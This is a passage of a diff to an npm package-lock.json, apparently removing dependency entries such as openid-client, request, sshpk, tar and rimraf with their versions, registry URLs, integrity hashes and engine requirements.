"sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "dependencies": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "dependencies": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "engines": { - "node": ">=16 || 14 >=14.18" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/path-scurry/node_modules/lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "node_modules/picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "engines": { - "node": ">=6" - } - }, - "node_modules/pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "dependencies": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/rfc4648": { - "version": "1.5.1", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.1.tgz", - "integrity": "sha512-60e/YWs2/D3MV1ErdjhJHcmlgnyLUiG4X/14dgsfm9/zmCWLN16xI6YqJYSCd/OANM7bUNzJqPY5B8/02S9Ibw==" - }, - "node_modules/rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "dependencies": { - "glob": "^10.3.7" - }, - "bin": { - "rimraf": "dist/esm/bin.mjs" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/rimraf/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/rimraf/node_modules/glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", - "dependencies": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - }, - "bin": { - "glob": "dist/esm/bin.mjs" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/rimraf/node_modules/minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/string-width-cjs": { - "name": "string-width", - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi-cjs": { - "name": "strip-ansi", - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "engines": { - "node": ">=18" - } - }, - "node_modules/tar/node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "engines": { - "node": ">=18" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": 